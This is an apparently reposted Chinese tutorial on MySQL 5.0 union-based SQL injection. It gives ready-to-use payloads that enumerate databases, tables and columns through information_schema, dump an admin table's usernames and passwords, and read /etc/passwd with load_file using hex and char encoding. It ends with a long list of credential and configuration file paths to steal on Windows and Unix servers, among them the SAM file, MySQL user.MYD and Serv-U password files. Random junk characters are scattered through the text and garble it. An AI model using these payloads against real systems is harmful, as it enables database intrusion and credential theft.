mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
$ q# ?; s8 T: u! Z& S; p$ W

* o# s/ e; D: n& y
, o/ O, z) S, \2 `Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
0 L# x1 H% ?) q  D* y明。
7 Z& H0 c  e1 }5 A7 B2 S" ~1 }1.得到所有数据库名：
4 M9 D2 S* N1 i7 u- c4 W|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称
9 A5 ^' P( R5 E# E" v/ x2 e
8 K  p& y; j& {1 w5 K& ~0 Q|TABLES ->存储表名
* `  K* N9 w3 o9 x  r5 Q2 p: X- ~|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
0 ~8 Q! g. @( [3 W2 \; _! X# l& y|—字段：TABLE_NAME ->存储表的表名
0 t9 X, d1 }4 x3 b
|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
, F7 ~$ x3 q& ^3 I$ J+ H|—字段：TABLE_NAME ->存储所属表的名称

8 r9 J5 {8 z8 ?) u/ T( K; D5 a|—字段：COLUMN_NAME ->该字段的名称
$ ^# R) T; R; x
! ^$ Q" q9 c) H+ l- R#########################################################################
##
' h0 j1 ^' r" H! m# j
0×001 获取系统信息:
# x' G" L, e- G! z3 e
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
9 B2 ^+ _2 D# ^+ {& ~3 [(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
$ `) q0 R" Z, G3 D
/*

+ v0 r" e* A, t6 O7 e@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
3 ]$ C% L, H5 @  I+ J( d+ Qdatabase() 当前数据库名称
0x3c62723e 换行HEX值

# X  Y1 ^8 R4 q% L) w: i*/
) n1 j8 T9 J8 |: j# ~
! k- n# n; H! j" y# G- W0 T% r######################################################################

! p9 d* K- e  g+ z  f0×002 获取表名
% D: I+ j: p, {6 a% l  D  W
. }9 X0 k- T* [* @  t1 punion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
- Y2 n/ F/ N- K, ^! Y$ k. W5 E+ H
/*

7 A' _9 f% }! u) s; K- G% o0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
. P' f" s( Q6 C5 z
4 H7 }7 v4 q5 E3 T' P*/
) G7 j7 R$ t, o3 S
######################################################################
! f  u3 D% z8 Y$ w7 V! Y* W
! `! ^: ~/ C2 Y0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and
4 K1 X. F& E: h6 J; B! \+ ?

table_schema=0x67617264656e limit 1 /*
- x& V2 f. Y, n' P7 X
/*
+ q! b  V  M* N( X% p' F- R
8 J# H8 J* A8 T% Y1 Qgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段
3 }& E0 h& i% s2 z( N: a- Q& P
0x61646d696e ->选择一个表
. |- [7 u8 o% y" O
( G* [( @5 _/ D4 J0 y, [# E! i0x67617264656e ->数据库名

: X& q6 O! R5 ?& g5 d*/

#####################################################################
  q; E0 n/ s3 H) B4 e* F9 Z" b
0×004 获取数据
" U" ?% k+ o* m' P, V# B
7 h: ?* Z0 |( o3 o1 p, lunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

- a- T0 Z% @$ L" R. I! Cunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
; O5 l! F0 X6 S- O) L$ R6 n& ^( V: f
* R" i7 e& i5 M/*
% F2 O7 ]8 m, f' g2 l% n9 d/ T- C
6 ^' u& d6 T* Q0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据

; o( o, m6 \+ B! A*/
' d- o5 m5 i9 y8 p) ]/ f

- X) x7 T, e: o% I, s/ M2 Y! y( F

$ U* W. o' _3 V
' d) \0 P& m; D$ c' c顺便添加一些mysql注入时非常有用的一些东西
1 ^/ h5 N5 o/ l8 R$ y3 X7 q" c" W
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

" ?' t5 L7 A6 v8 e1:system_user() 系统用户名
! a+ n1 M5 J  L8 R# \! M4 [4 v# V0 G2:user()        用户名
# ]# ?+ j  q& s* h: e* |7 ]" v3:current_user()  当前用户名
+ x% s8 e1 Z1 S0 [8 S4:session_user()连接数据库的用户名
" ]  w8 p* f6 K4 O5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
1 s5 X% M/ C6 v8 u8@datadir     读取数据库路径
0 Q) c9 `; N! Z% R, }$ Y  f* _9@basedir    MYSQL 安装路径
4 c/ G3 S$ @2 f6 ~* j2 r7 T0 F10@version_compile_os   操作系统  Windows Server 2003,
8 E4 C! j  Y, N# }2 ?1 O收集的一些路径：
# W7 E; w' a5 _* G4 oWINDOWS下:
  j4 r! s6 X& D8 S! ^9 {; [  ic:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
8 z. Y; K, `' A, A5 yc:/winnt/my.ini
. r0 ?8 f% X" N; h3 bc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
. d& |- w; t3 d# F& s! `# a" Uc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
* _: |1 V' E5 Q% \. `* G# f; Sc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
0 A$ t4 C# q: N: m( F! D4 |7 dc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
4 w0 l$ [& E6 H$ z//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.

. H- x* l% T* b5 D
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
& ]& c; n( ?& R  E- Rc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

% A6 _% X* l, H  gLUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
, m' c8 H6 \4 v, Q/usr/local/apache2/conf/httpd.conf
& G$ T. C; S1 ?0 k/ a+ d- v" {/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
+ B0 |$ R3 T6 O! @' Q/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/ R( x6 F) K2 v6 Q/ Y/etc/my.cnf //mysql的配置文件
: ]9 [7 l1 {! k( @' C$ a( }2 A# w/etc/redhat-release //系统版本
$ P$ O+ V! D/ f) E$ O! S6 u8 @/etc/issue
/etc/issue.net
9 S  b6 ?5 d' k. h+ _" B# @# m2 h$ @- l/usr/local/app/php5/lib/php.ini //PHP相关设置
; V1 U/ Q& \, T9 [# P) d( l/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
5 J* j/ t$ e, H" D3 w# W/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
+ z8 X* V, X, z/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
, [4 V' x" u# \: ^2 r& h$ Wreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

7 f) D. V2 R! K